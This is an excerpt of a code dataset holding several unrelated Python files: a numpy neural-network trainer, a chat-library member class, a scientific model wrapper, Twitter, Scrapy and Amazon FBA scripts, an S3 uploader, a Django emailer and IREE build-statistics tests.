layer\n \"\"\"\n return x\n\n def df(self, x):\n \"\"\"Return derivative tensor of linear activation tensor.\n\n :type x: ndarray\n :param x: weighted input to layer\n \"\"\"\n return np.ones_like(x)\n\n\nclass Sigmoid(Layer):\n \"\"\"Numerically-stable sigmoid activation.\"\"\"\n\n def f(self, x):\n \"\"\"Return numerically-stable sigmoid activation.\n\n :type x: ndarray\n :param x: weighted input to layer\n \"\"\"\n if np.all(x) >= 0:\n y = np.exp(-x)\n return 1 / (1 + y)\n else:\n y = np.exp(x)\n return y / (1 + y)\n\n def df(self, x):\n \"\"\"Return derivative of sigmoid evaluated at x.\n\n :type x: ndarray\n :param x: weighted input to layer\n \"\"\"\n y = self.f(x)\n return y * (1 - y)\n\n\nclass Tanh(Layer):\n \"\"\"Hyperbolic tangent activation.\"\"\"\n\n def f(self, x):\n \"\"\"Return hyperbolic tangent activation.\n\n :type x: ndarray\n :param x: weighted input to layer\n \"\"\"\n return np.tanh(x)\n\n def df(self, x):\n \"\"\"Return derivative of hyperbolic tangent evaluated at x.\n\n :type x: ndarray\n :param x: weighted input to layer\n \"\"\"\n return 1 - np.tanh(x)**2\n\n\nclass Relu(Layer):\n \"\"\"Rectified linear unit activation.\"\"\"\n\n def f(self, x):\n \"\"\"Return ReLU activation.\n\n :type x: ndarray\n :param x: weighted input to layer\n \"\"\"\n try:\n return np.maximum(x, 0, x)\n except TypeError:\n # When x is not iterable (e.g. batch size = 1)\n return np.maximum(x, 0)\n\n def df(self, x):\n \"\"\"Return derivative of ReLU evaluated at x.\n\n :type x: ndarray\n :param x: weighted input to layer\n \"\"\"\n return (x > 0) * 1\n\n\nclass Softmax(Layer):\n \"\"\"Row-wise vector-to-vector softmax transformation.\"\"\"\n\n def f(self, matrix):\n \"\"\"Return matrix after rows are cast to softmax distributions.\n\n :type matrix: ndarray\n :param matrix: row per example; col per class\n\n :returns: (ndarray) of same shape whose rows are softmaxed\n \"\"\"\n # Allow passing vectors\n if matrix.ndim == 1:\n matrix = np.array([matrix])\n\n # Subtract the max of each row from each row\n row_maxes = np.max(matrix, axis=1)\n row_maxes = row_maxes[:, np.newaxis] # for broadcasting\n matrix = matrix - row_maxes\n\n # Compute softmax\n e_matrix = np.exp(matrix)\n row_sums = e_matrix.sum(axis=1)\n # Store output for backward pass\n self.output = e_matrix / row_sums[:, None]\n return self.output\n\n def backward(self, labels, l1_coef, l2_coef):\n \"\"\"Return Jacobian of prior layer activation assuming nll cost.\n\n :type labels: ndarray\n :param labels: each row a onehot class label\n\n :type l1_coef: float\n :param l1_coef: penalty on mean of absolute values of weights\n\n :type l2_coef: float\n :param l2_coef: penalty on to mean of squared weights\n \"\"\"\n # Jacobian of weighted input\n dz = (self.output - labels) / len(labels)\n # Jacobian of weights\n self.dw = np.dot(self.a.T, dz)\n\n # Add derivative of l1_penalty to weights Jacobian\n # ------------------------------------------------\n # Since l1 is summed absolute value of weights scaled by\n # (1/n) * l1_coef, the slope is -1 or 1 for weights being\n # positive or negative respectively\n self.dw += (l1_coef / dz.shape[0]) * np.sign(self.w)\n\n # Add derivative of l2_penalty to weights Jacobian\n # ------------------------------------------------\n # Since l2 is summed squared weights scaled by (1/2n) * l2_coef\n # the slope is (l2_coef / n) * weights\n self.dw += (l2_coef / dz.shape[0]) * self.w\n\n # Jacobian of bias (no regularization on biases)\n self.db = dz.mean(axis=0)\n # Jacobian of prior layer activation\n return np.dot(dz, self.w.T)\n\n\n# ----------------------------- #\n# #\n# Convolution layers #\n# #\n# ----------------------------- #\n\n\nclass Convolution:\n \"\"\"Convolution layer.\"\"\"\n\n def __init__(self, kernel_shape, n_kernels, stride=1):\n \"\"\"Initialize with kernel shape and stride.\"\"\"\n self.kernel_shape = kernel_shape\n self.n_kernels = n_kernels\n self.stride = stride\n self.W = None\n self.b = None\n\n def init_params(self, prior_layer_channels):\n \"\"\"Initialize weight matrix and bias vector.\n\n Note:\n Needs size of previous layer to determine number of\n rows in weight matrix. We ascertain size of previous\n layer by number of columns in 'a' when forward method\n is called for the first time.\n\n :type prior_layer_size: int\n :param prior_layer_size: width of prior layer\n\n :returns: None\n \"\"\"\n pass\n\n\nclass MaxPooling:\n \"\"\"Max pooling layer.\"\"\"\n\n def __init__(self, k_shape, stride=1):\n \"\"\"Initialize with kernel shape and stride.\"\"\"\n self.k_shape = k_shape\n self.stride = stride\n\n def forward(self, images):\n \"\"\"Return max element in each kernel window for each image.\n\n :type images: ndarray\n :param images: 3-d tensor where images are the first dimension\n\n :returns: 3-d tensor where output images are the first dimension\n \"\"\"\n max_values = [] # for forward\n max_indices = [] # for backward\n\n # We track the lower-right corner of the kernel\n for image in images:\n row = self.k_shape[0] # bottom of kernel + 1\n while row <= image.shape[0]:\n col = self.k_shape[1] # right of kernel + 1\n while col <= image.shape[1]:\n box = image[row - self.k_shape[0]:row,\n col - self.k_shape[1]:col]\n max_values.append(box.max()) # for forward\n max_indices.append(box.argmax()) # for backward\n col += 1\n row += 1\n\n # Cast to numpy for reshaping\n max_values = np.array(max_values)\n max_indices = np.array(max_indices)\n\n # Shape of each output image\n m = int((images.shape[1] - self.k_shape[0]) / self.stride) + 1\n n = int((images.shape[2] - self.k_shape[1]) / self.stride) + 1\n\n # Reshape and save both for backward pass\n self.max_indices = max_indices.reshape(len(images), m, n)\n self.max_values = max_values.reshape((len(images), m, n))\n\n return self.max_values\n\n def backward(self, delta_output_images):\n \"\"\"Backward through max pooling layer.\"\"\"\n for d_img in delta_output_images:\n for i, row in enumerate(d_img):\n pass\n\n\n# ----------------------------- #\n# #\n# Miscelaneous helper functions #\n# #\n# ----------------------------- #\n\n\ndef shuffle_together(a, b):\n \"\"\"Return a tuple of (a, b) after shuffling together by first index.\"\"\"\n together = list(zip(a, b))\n shuffle(together)\n a[:], b[:] = zip(*together)\n return a, b\n\n\ndef train_val_split(data, labels, val_proportion):\n \"\"\"Return train data, train labels, val data, val labels.\n\n :type data: iterable\n :param data: first dimension should be examples\n\n :type labels: iterable\n \"\"\"\n data, labels = shuffle_together(data, labels)\n split_index = int((1 - val_proportion) * len(data))\n train_data, val_data = data[:split_index], data[split_index:]\n train_labels, val_labels = labels[:split_index], labels[split_index:]\n return train_data, train_labels, val_data, val_labels\n\n\ndef minibatches(data, labels, size):\n \"\"\"Yield mini-batched tuples of features and labels.\n\n :type data: ndarray\n :param data: feature set\n\n :type labels: ndarray\n :param labels: correct class labels\n\n :yields: (tuple) a minibatch of (features, labels)\n \"\"\"\n data, labels = shuffle_together(data, labels)\n # Yield minibatches until consumed\n k = 0\n while (k + 1) * size < len(data):\n # Here we'll fit another full size minibatch\n yield data[k * size:(k + 1) * size], labels[k * size:(k + 1) * size]\n k = k + 1\n # Consume remaining items and then issue stop_iter()\n yield data[k * size:], labels[k * size:]\n\n\ndef load(dataset, validation_proportion):\n \"\"\"Load specified dataset and split training into validation.\"\"\"\n # Load chosen dataset\n print(\"Loading %s from /home/USER/data/%s\" % (dataset, dataset))\n dataset = {\n 'mnist': mnist,\n 'cifar10': cifar10,\n }[dataset]\n train_images, train_labels, test_images, test_labels = dataset(onehot=True)\n print(\"Done.\")\n\n # Split validation set from training set\n train_images, train_labels, val_images, val_labels = \\\n train_val_split(train_images, train_labels, validation_proportion)\n\n return {\n 'train_images': train_images,\n 'val_images': val_images,\n 'test_images': test_images,\n 'train_labels': train_labels,\n 'val_labels': val_labels,\n 'test_labels': test_labels,\n }\n\n\n# ----------------------------- #\n# #\n# Training function #\n# #\n# ----------------------------- #\n\n\ndef train(network, n_epochs, patience, eta, minibatch_size,\n input_keep_prob, hidden_keep_prob, l1_coef, l2_coef,\n eta_taper, clipping_threshold, numerical_gradient_checking,\n train_images, val_images, test_images,\n train_labels, val_labels, test_labels, **kwargs):\n \"\"\"Train until no improvement seen in some number of epochs.\"\"\"\n print()\n print(\"Parameters\")\n print(\"----------\")\n for key in params:\n print(\"{}: {}\".format(key, params[key]))\n print(\"----------\")\n\n print()\n print(\"Training...\")\n print(\"New best validation cost = *\")\n epoch = 0 # count epochs\n min_cost = 1e10 # track minimum cost seen so far\n epochs_since_min = 0 # track epochs since last new minimum\n\n # Training\n # -----------------------------------------------------------------\n while epochs_since_min < patience and epoch < n_epochs:\n epoch += 1\n for images, labels in minibatches(\n train_images, train_labels, minibatch_size):\n # Iterate through all minibatches\n network.forward(images, input_keep_prob, hidden_keep_prob)\n network.backward(labels, l1_coef, l2_coef)\n network.sgd(eta, eta_taper, epoch, clipping_threshold)\n\n # Since we check validation cost and accuracy with no\n # dropout applied, we need to scale our weights.\n #\n # We scale weights to correct for dropout, which pushes\n # the network to learn bigger weights on account of\n # some activations being missing each train iteration.\n network[0].w *= input_keep_prob\n for layer in network[1:]:\n layer.w *= hidden_keep_prob\n\n # Get cost (no dropout)\n network.forward(val_images)\n cost = network.cost(val_labels, l1_coef, l2_coef)\n\n # Update minimum cost seen\n if cost < min_cost:\n tag = '*'\n min_cost = cost\n epochs_since_min = 0\n else:\n tag = ''\n epochs_since_min += 1\n\n # Compute and print desired stats for epoch\n # -- TODO: Don't reach into global parameters for this\n stats = 'epoch {:<2d}'.format(epoch)\n if params['cost']:\n stats += ' | cost {:.3f}'.format(cost)\n if params['val_acc']:\n val_acc = network.accuracy(val_labels)\n stats += ' | val acc {:.3f}'.format(val_acc)\n if params['top_k_val_acc']:\n k = params['top_k_val_acc']\n top_k_val_acc = network.top_k_accuracy(val_labels, k)\n stats += ' | top {} val acc {:.3f}'.format(k, top_k_val_acc)\n print(stats + ' | {}'.format(tag))\n\n # Unscale the weights so we can continue training with dropout\n network[0].w /= input_keep_prob\n for layer in network[1:]:\n layer.w /= hidden_keep_prob\n # -----------------------------------------------------------------\n # End training\n\n # Print the reason that training ended\n print(\"-----------------\")\n if epochs_since_min >= patience:\n print(\"No new minimum cost seen in %d epochs.\"\n % epochs_since_min)\n elif epoch > n_epochs:\n print(\"Completed %d epochs.\")\n print(\"Ending traning.\")\n\n # Scale weights to repair dropout\n network[0].w *= input_keep_prob\n for layer in network[1:]:\n layer.w *= hidden_keep_prob\n\n # Get test accuracy (no dropout)\n network.forward(test_images)\n test_acc = network.accuracy(test_labels)\n print(\"test acc %.3f\" % test_acc)\n\n # Check numerical gradients\n #\n # We check at the end of training to because\n # negative log likelihood cost gives inf's for\n # very incorrect class predictions, which tend\n # to occur near the beginning of training.\n if numerical_gradient_checking:\n print(\"Checking numerical gradients...\")\n print(network.numerical_gradient_check(val_images, val_labels))\n\n\ndef main():\n \"\"\"Construct and train user-specified achitecture.\"\"\"\n data = load(params['dataset'], params['val_proportion'])\n network = Network()\n for layer in params['layers']:\n layer_type = {\n 'Linear': Linear,\n 'Sigmoid': Sigmoid,\n 'Tanh': Tanh,\n 'Relu': Relu,\n 'Softmax': Softmax,\n }[layer[0]]\n layer_size = layer[1]\n network.append(layer_type, layer_size)\n train(network, **data, **params)\n\nif __name__ == '__main__':\n main()\n","sub_path":"pymlp.py","file_name":"pymlp.py","file_ext":"py","file_size_in_byte":31414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"250967782","text":"from __future__ import annotations\n\nfrom typing import TYPE_CHECKING, Optional\n\nfrom .user import User\n\nif TYPE_CHECKING:\n from .server import Server\n from .state import State\n from .types import Member as MemberPayload\n\n\n__all__ = (\"Member\",)\n\ndef flattern_user(member: Member, user: User):\n for attr in user.__flattern_attributes__:\n setattr(member, attr, getattr(user, attr))\n\nclass Member(User):\n \"\"\"Represents a member of a server, subclasses :class:`User`\n \n Attributes\n -----------\n nickname: Optional[:class:`str`]\n The nickname of the member if any\n roles: list[:class:`Role`]\n The roles of the member, ordered by the role's rank in decending order\n server: :class:`Server`\n The server the member belongs to\n \"\"\"\n __slots__ = (\"_state\", \"nickname\", \"roles\", \"server\")\n \n def __init__(self, data: MemberPayload, server: Server, state: State):\n user = state.get_user(data[\"_id\"][\"user\"])\n assert user\n flattern_user(self, user)\n\n self._state = state\n self.nickname = data.get(\"nickname\")\n roles = []\n\n for role in (server.get_role(role_id) for role_id in data.get(\"roles\", [])):\n if role:\n roles.append(role)\n\n self.roles = sorted(roles, key=lambda role: role.rank, reverse=True)\n \n self.server = server\n\n @property\n def owner(self) -> Optional[User]:\n owner_id = self.owner_id\n\n if not owner_id:\n return\n\n return self.state.get_user(owner_id)\n","sub_path":"revolt/member.py","file_name":"member.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"412537022","text":"import numpy as np\nfrom ._CFunctions import _CgetAvMav,_CgetAvMavCart,_CgetScaledMav,_CgetScaledMavCart\nfrom ._CTConv import _CTConv\n\ndef Mav(x,y,SMR=None,Coord='xy',ShowDC=True,OnlyDC=False,Validate=True,m=[1,3]):\n\t'''\n\tGet the combined cold average ion mass model output for a given set \n\tof input coordinates.\n\t\n\tInputs\n\t======\n\tx : float\n\t\tArray or scalar coordinate (see Coord for more info).\n\ty : float\n\t\tArray or scalar coordinate (see Coord for more info).\n\tSMR : float | None\n\t\tSet to None for the average model, or a float (scalar or array \n\t\twith the same shape as x and y) for the model which is scaled by\n\t\tthe SMR index.\n\tCoord : str\n\t\t'xy'|'ml' - Denotes the input coordinates provided by the inputs\n\t\tx and y, where Coord='xy' corresponds to the x and y SM \n\t\tcoordinates and Coord='ml' means that x and y represent MLT (in\n\t\thours) and L-shell (in R_e), respectively.\n\tShowDC : bool\n\t\tIf True (default) then the DC component is included in the model \n\t\toutput, otherwise the output just contains the periodic \n\t\tcomponents of the model.\n\tOnlyDC : bool\n\t\tIf True (default = False) then the periodic components are \n\t\tignored and only the DC component is returned.\n\tValidate : bool\n\t\tIf True (default) then the positions are checked for validity \n\t\t(2 <= L <= 5.9), where invalid ones are set to NaN.\n\tm : int\n\t\tThis should be a 2-element list/tuple/array which contains the\n\t\tlowest and highest m-numbers to include in the output (default =\n\t\t[1,3]).\n\t\t\n\tReturns\n\t=======\n\tout : float\n\t\tArray of average ion mass (amu).\n\t\n\t'''\n\t\n\t\n\t#get the number of elements first\n\t_n = np.int32(np.size(x))\n\t\n\t#work out the shape of the input data\n\tsh = np.shape(x)\n\t\n\t#select the possible models based on the input coords\n\tif Coord == 'ml':\n\t\t#MLT and L shell\n\t\tav = _CgetAvMav\n\t\tann = _CgetScaledMav\n\telse:\n\t\t#x and y SM\n\t\tav = _CgetAvMavCart\n\t\tann = _CgetScaledMavCart\n\t\n\t#now format the positions correctly\n\t_x = _CTConv(x,'c_float_ptr')\n\t_y = _CTConv(y,'c_float_ptr')\n\t_ShowDC = _CTConv(ShowDC,'c_bool')\n\t_OnlyDC = _CTConv(OnlyDC,'c_bool')\n\t_Validate = _CTConv(Validate,'c_bool')\n\t_m0 = _CTConv(m[0],'c_int')\n\t_m1 = _CTConv(m[1],'c_int')\n\t\n\t#create the output array\n\t_out = np.zeros(_n,dtype='float32')\n\n\t#select and run the model based on whether we have the scaling parameter\n\tif SMR is None:\n\t\t#average model\n\t\tav(_n,_x,_y,_ShowDC,_OnlyDC,_Validate,_m0,_m1,_out)\n\telse:\n\t\t#work out the scaling parameter\n\t\tif np.size(SMR) == 1:\n\t\t\t_smr = np.zeros(_n,dtype='float32') + SMR\n\t\telse:\n\t\t\t_smr = _CTConv(SMR,'c_float_ptr')\n\t\tann(_n,_x,_y,_smr,_ShowDC,_OnlyDC,_Validate,_m0,_m1,_out)\n\t\t\n\t#return to original shape\n\tout = _out.reshape(sh)\n\t\n\treturn out\n\t\t\n","sub_path":"spicedmodel/Mav.py","file_name":"Mav.py","file_ext":"py","file_size_in_byte":2659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"567683719","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport twitter\nfrom pit import Pit\nimport time\n\nNOT_LIKES_LIST_FILE = 'not_likes.txt'\nLIKES_MAX_COUNT = 200\n\n\ndef write_no_likes(no_likes, fp):\n num_lines = 0\n for no_like in no_likes:\n text = no_like.text.replace('\\n', '')\n fp.writelines(text)\n fp.writelines('\\n')\n num_lines += 1\n return num_lines\n\n\ndef main():\n conf = Pit.get('twitter.com', {'require': {'consumer_key': 'ckey',\n 'consumer_secret': 'csecret',\n 'access_token_key': 'atkey',\n 'access_token_secret':\n 'atsecret'}})\n\n api = twitter.Api(consumer_key=conf['consumer_key'],\n consumer_secret=conf['consumer_secret'],\n access_token_key=conf['access_token_key'],\n access_token_secret=conf['access_token_secret'],\n sleep_on_rate_limit=True)\n\n max_id = None\n total_no_likes = 0\n with open(NOT_LIKES_LIST_FILE, 'w') as fp:\n while True:\n home = api.GetUserTimeline(\n max_id=max_id, count=LIKES_MAX_COUNT, exclude_replies=True)\n if len(home) == 0:\n break\n else:\n total_no_likes += write_no_likes(home, fp)\n max_id = home[-1].id - 1\n time.sleep(60.5)\n\n print('Total no likes:', total_no_likes)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"gen_not_like_list.py","file_name":"gen_not_like_list.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"264513298","text":"# -*- coding: utf-8 -*-\nimport django\nimport os\nimport re\nimport scrapy\nimport sys\nimport requests as r\n\nDEBUG = True\nif DEBUG:\n PATH_TO_DJANGO = '/Users/nikitatonkoskurov/PycharmProjects/domofound2/'\nelse:\n PATH_TO_DJANGO = '/var/www/dom/src/'\n\nsys.path.append(PATH_TO_DJANGO)\nos.environ['DJANGO_SETTINGS_MODULE'] = 'domofound2.settings'\ndjango.setup()\nfrom apps.base.models import HouseModel, HouseInfo, Image\n\n\ndef store_images(house_id_val, images):\n house_id = HouseModel.objects.filter(house_id=house_id_val)\n if house_id:\n house = HouseModel.objects.get(house_id=house_id_val)\n for image in images:\n Image.objects.create(image_link=image, house=house)\n else:\n print('Cant find house with this house_id')\n\n\nclass KvadroomV1Pipeline:\n def process_item(self, item, spider):\n if item['mode'] == 0:\n self.save_house(item)\n else:\n self.save_info(item)\n return item\n\n def save_house(self, item):\n house_id_val = item['house_id']\n img_val = item['img']\n title_val = item['title']\n link_val = item['link']\n price_val = item['price']\n address_val = item['address']\n host_val = item['host']\n city_val = item['city']\n x_cord_val = item['cords'][0]\n y_cord_val = item['cords'][1]\n house_type_val = item['house_type']\n offer_type = item['offer_type']\n house = HouseModel.objects.filter(house_id=house_id_val)\n if house:\n print('This row is already exist')\n else:\n HouseModel.objects.create(house_id=house_id_val, title=title_val, link=link_val,\n address=address_val,\n Host=host_val, title_image=img_val, price=price_val, city=city_val,\n x_cord=x_cord_val, y_cord=y_cord_val, type=house_type_val, ready_to_go=False,\n offer_type=offer_type)\n\n def save_info(self, item):\n house_id_val = int(item['house_id'])\n type_of_participation_val = item['type_of_participation']\n official_builder_val = item['official_builder']\n name_of_build_val = item['name_of_build']\n decoration_val = item['decoration']\n house_type_val = item['house_type']\n num_of_rooms_val = item['num_of_rooms']\n total_area_val = item['total_area']\n living_area_val = item['living_area']\n kitchen_area_val = item['kitchen_area']\n floor_val = item['floor']\n floor_count_val = item['floor_count']\n land_area = item['land_area']\n data = item['data'],\n img_set = item['img_set']\n phone_val = item['phone_num']\n if HouseInfo.objects.filter(house_id=house_id_val):\n print('this row is already exist')\n else:\n info = HouseInfo.objects.create(house_id=house_id_val, type_of_participation=type_of_participation_val,\n official_builder=official_builder_val, name_of_build=name_of_build_val,\n decoration=decoration_val, floor=floor_val,\n floor_count=floor_count_val, house_type=house_type_val,\n num_of_rooms=num_of_rooms_val, living_area=living_area_val,\n kitchen_area=kitchen_area_val,\n phone=phone_val, total_area=total_area_val, land_area=land_area)\n store_images(house_id_val, img_set)\n info.save()\n print('Add info to house')\n house = HouseModel.objects.get(house_id=house_id_val)\n house.house_info = info\n house.data = data\n house.ready_to_go = True\n house.save()\n","sub_path":"kvadroom_v1/kvadroom_v1/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":3879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"164480684","text":"# -*- coding: UTF-8 -*-\nimport requests\n\nurl = 'http://httpbin.org/post'\n\n\n'''\npost参数内如果包含了%,传递时会进行转义。\n以下为fiddler内截取的post参数,直接复制到到字典d内,%会被转义为%25,post结果会出错\naction_mode=apply&username=admin&Pwd=YWRtaW4%3D&_pageStyle=pc\n%3D需要转意为“=”,因此Pwd=\"YWRtaW4=\"\n\n'''\nd = {'key1': 'value1', 'key2': 'value2'}\nr = requests.post(url, data=d)\nprint(r.text)\n","sub_path":"网络相关/requests模块/post范例.py","file_name":"post范例.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"264762740","text":"import json\nimport sys\nimport traceback\n\nfrom django.http import JsonResponse\n\nfrom amzn_utilities import _create_sale, _save_objects, _FBA_start_date\nfrom .thirdparty_apis.amazon_sellercentral import load_orders, order_details, get_order\nfrom sales.models import Sale\n\n\nimport logging\nlogger = logging.getLogger('default')\n\n\ndef missing_amazon(request):\n try:\n summary_msg, error_msgs = amazon_order(request.user.username, request.body)\n return JsonResponse({'summary': summary_msg, 'errors': error_msgs})\n except:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n traceback.print_tb(exc_traceback, limit=1, file=sys.stdout)\n msg = 'FBA fill-missing failed on %s, %s' % (exc_type, exc_value)\n return JsonResponse({'summary': msg, 'errors': []})\n\n\ndef upload(request):\n try:\n summary_msg, error_msgs = load_FBA(request.user.username)\n return JsonResponse({'summary': summary_msg, 'errors': error_msgs})\n except:\n exc_type, exc_value, exc_traceback = sys.exc_info()\n traceback.print_tb(exc_traceback, limit=1, file=sys.stdout)\n msg = 'FBA upload failed on %s, %s' % (exc_type, exc_value)\n return JsonResponse({'summary': msg, 'errors': []})\n\n\ndef amazon_order(user, data):\n errors = []\n order_id = json.loads(data).get('input_value')\n if Sale.objects.filter(external_channel_id=order_id).count() > 0:\n msg = '%s already exists' % order_id\n return msg, errors\n else:\n try:\n s, us = _create_sale(get_order(order_id), order_details(order_id))\n _save_objects(s, us, 'AFN')\n logger.info('%s saved AMZN order %s' % (user, order_id))\n msg = '%s created order %s' % (user, order_id)\n except:\n logger.exception('%s failed to save order and/or fulfillment for AMZN order %s' % (user, object_id))\n exc_type, exc_value, exc_traceback = sys.exc_info()\n msg = exc_value\n return msg, errors\n\n\ndef load_FBA(user, from_date=None):\n if not from_date:\n from_date = _FBA_start_date()\n\n orders = load_orders(from_date)\n orders_dict = dict((o.get('AmazonOrderId'), o) for o in orders)\n\n FBA_ids = [o.get('AmazonOrderId') for o in orders]\n existing_ids = [s['external_channel_id'] for s in Sale.objects.filter(external_channel_id__in=FBA_ids).values('external_channel_id')]\n\n new_ids = [o for o in FBA_ids if o not in existing_ids]\n cmplt_new_ids = [o for o in new_ids if orders_dict.get(o).get('OrderStatus') != 'Pending']\n new_order_ctr = 0\n bad_order_ctr = 0\n errors = []\n\n for o in cmplt_new_ids:\n try:\n od = order_details(o)\n except:\n logger.exception('Failed to get order details for AMZN order %s' % o)\n\n sale, unitsales = _create_sale(orders_dict.get(o), od)\n\n try:\n _save_objects(sale, unitsales, orders_dict.get(o).get('FulfillmentChannel'))\n logger.info('%s saved AMZN order %s' % (user, o))\n new_order_ctr += 1\n except:\n logger.exception('%s failed to save order and/or fulfillment for AMZN order %s' % (user, o))\n bad_order_ctr += 1\n\n summary_msg = ('Loaded FBA orders: %d new orders, %d bad orders'\n % (new_order_ctr, bad_order_ctr))\n return summary_msg, errors\n","sub_path":"savor/importers/FBA.py","file_name":"FBA.py","file_ext":"py","file_size_in_byte":3352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"318566426","text":"import sys\nimport os\nimport botocore\nimport traceback\nimport boto3\nimport argparse\n\n\ndef main():\n \"\"\"Main entry point for the program.\"\"\"\n arg_parser = argparse.ArgumentParser(description='Processes a given lte xml files s3 bucket.')\n arg_parser.add_argument('--s3_bucket', action=\"store\", dest=\"s3_bucket\",\n help=\"Input s3 bucket name\", required=True, type=str)\n arg_parser.add_argument('--folder_prefix', action=\"store\", dest=\"folder_prefix\",\n help=\"folder prefix to use\", required=True, type=str)\n arg_parser.add_argument('--files', action=\"store\", dest=\"files\",\n help=\"comma separated list of files\", required=True, type=str)\n args = arg_parser.parse_args()\n files = args.files.split(\",\")\n for file in files:\n # print(file)\n upload_to_s3(args.s3_bucket, args.folder_prefix, file)\n\n\ndef upload_to_s3(bucket, prefix, local_file_path):\n try:\n s3 = boto3.resource('s3')\n local_filename = os.path.basename(local_file_path)\n s3.Bucket(bucket).upload_file(local_file_path, prefix + \"/\" + local_filename)\n except botocore.exceptions.ClientError as e:\n print(\"Exception: \\\"%s\\\" occurred while uploading file, exiting..\" % str(e))\n traceback.print_exc()\n # sys.exit(-1)\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","sub_path":"s3_utils.py","file_name":"s3_utils.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"141055434","text":"import datetime\n\nimport os\n\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.core.mail import send_mail\nfrom django.urls import reverse\nfrom django.utils import timezone\n\nfrom .forms import EmailerForm\nimport threading\n\nfrom .models import Email\n\n\ndef index(request):\n if request.method == 'POST':\n form = EmailerForm(request.POST)\n\n if form.is_valid():\n subject = form.cleaned_data['subject']\n message = form.cleaned_data['message']\n seconds = form.cleaned_data['seconds']\n to_whom = form.cleaned_data['to_whom']\n\n sender = os.environ.get('Email_user')\n\n recipients = []\n if to_whom:\n recipients.append(to_whom)\n\n t = threading.Timer(float(seconds), function=send_mail, args=(subject, message, sender, recipients))\n\n Email.objects.create(subject=subject,\n message=message,\n seconds=seconds,\n to_whom=to_whom\n )\n\n t.start()\n return HttpResponseRedirect(reverse('Emailer:detail'))\n else:\n form = EmailerForm()\n\n return render(request, 'index.html', {'form': form})\n\n\ndef detail_page(request):\n last_ten = Email.objects.all().order_by('-id')[:10]\n\n must_be_sent = Email.objects.all().filter(datetime_must_be_send__gt=timezone.now()).order_by('-id')\n\n already_sent = Email.objects.all().filter(datetime_must_be_send__lt=timezone.now()).order_by('-datetime_must_be_send')\n\n context = {'last_ten': last_ten, 'must_be_sent': must_be_sent, 'already_sent': already_sent}\n\n return render(request, 'detail.html', context)\n\n\n# git add .\n# git commit -m \"initial commit\"\n# git push heroku master\n# heroku open\n#\n","sub_path":"Emailer/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"179052161","text":"#!/usr/bin/env python3\n# Copyright 2022 The IREE Authors\n#\n# Licensed under the Apache License v2.0 with LLVM Exceptions.\n# See https://llvm.org/LICENSE.txt for license information.\n# SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception\n\nimport unittest\nimport zipfile\n\nfrom io import BytesIO, StringIO\n\nfrom common.benchmark_definition import ModuleComponentSizes\nfrom collect_compilation_statistics import CONST_COMPONENT_NAME, VM_COMPONENT_NAME, get_module_component_info, get_module_path, match_module_cmake_target, parse_compilation_time_from_ninja_log\n\n\nclass CollectCompilationStatistics(unittest.TestCase):\n\n def test_match_module_cmake_target(self):\n target = match_module_cmake_target(\n \"iree/iree-build/benchmark_suites/TFLite/vmfb/test.vmfb\")\n\n self.assertEqual(target, \"benchmark_suites/TFLite/vmfb/test.vmfb\")\n\n def test_match_module_cmake_target_not_match(self):\n target = match_module_cmake_target(\"benchmark_suites/TFLite/vmfb/test.mlir\")\n\n self.assertIsNone(target)\n\n def test_parse_compilation_time_from_ninja_log(self):\n target1 = \"benchmark_suites/TFLite/vmfb/deeplabv3.vmfb\"\n target2 = \"benchmark_suites/TFLite/vmfb/mobilessd.vmfb\"\n ninja_log = StringIO(\"# ninja log v5\\n\"\n f\"0\\t100\\taaa\\tbuild/{target1}\\taaa\\n\"\n f\"130\\t200\\tbbb\\tbuild/{target2}\\tbbb\\n\")\n\n target_map = parse_compilation_time_from_ninja_log(ninja_log)\n\n self.assertEqual(target_map, {target1: 100, target2: 70})\n\n def test_get_module_component_info(self):\n module_file = BytesIO()\n with zipfile.ZipFile(module_file, \"w\") as zip:\n zip.writestr(VM_COMPONENT_NAME, b\"abcd\")\n zip.writestr(CONST_COMPONENT_NAME, b\"123\")\n zip.writestr(\"main_dispatch_0_vulkan_spirv_fb.fb\", b\"bindata1\")\n zip.writestr(\"main_dispatch_1_vulkan_spirv_fb.fb\", b\"bindata2\")\n module_file_data = module_file.getvalue()\n\n component_sizes = get_module_component_info(BytesIO(module_file_data),\n len(module_file_data))\n\n self.assertEqual(\n component_sizes,\n ModuleComponentSizes(file_size=len(module_file_data),\n vm_component_size=4,\n const_component_size=3,\n total_dispatch_component_size=16))\n\n def test_get_module_component_info_unknown_components(self):\n module_file = BytesIO()\n with zipfile.ZipFile(module_file, \"w\") as zip:\n zip.writestr(VM_COMPONENT_NAME, b\"abcd\")\n zip.writestr(CONST_COMPONENT_NAME, b\"123\")\n zip.writestr(\"main_dispatch_0_unknown.fb\", b\"bindata\")\n module_file_data = module_file.getvalue()\n\n self.assertRaises(\n RuntimeError, lambda: get_module_component_info(\n BytesIO(module_file_data), len(module_file_data)))\n\n def test_get_module_path(self):\n flag_file = StringIO(\n f\"--function_inputs=1x2x3xf32\\n--module_file=/abcd.vmfb\")\n\n moduel_path = get_module_path(flag_file)\n\n self.assertEqual(moduel_path, 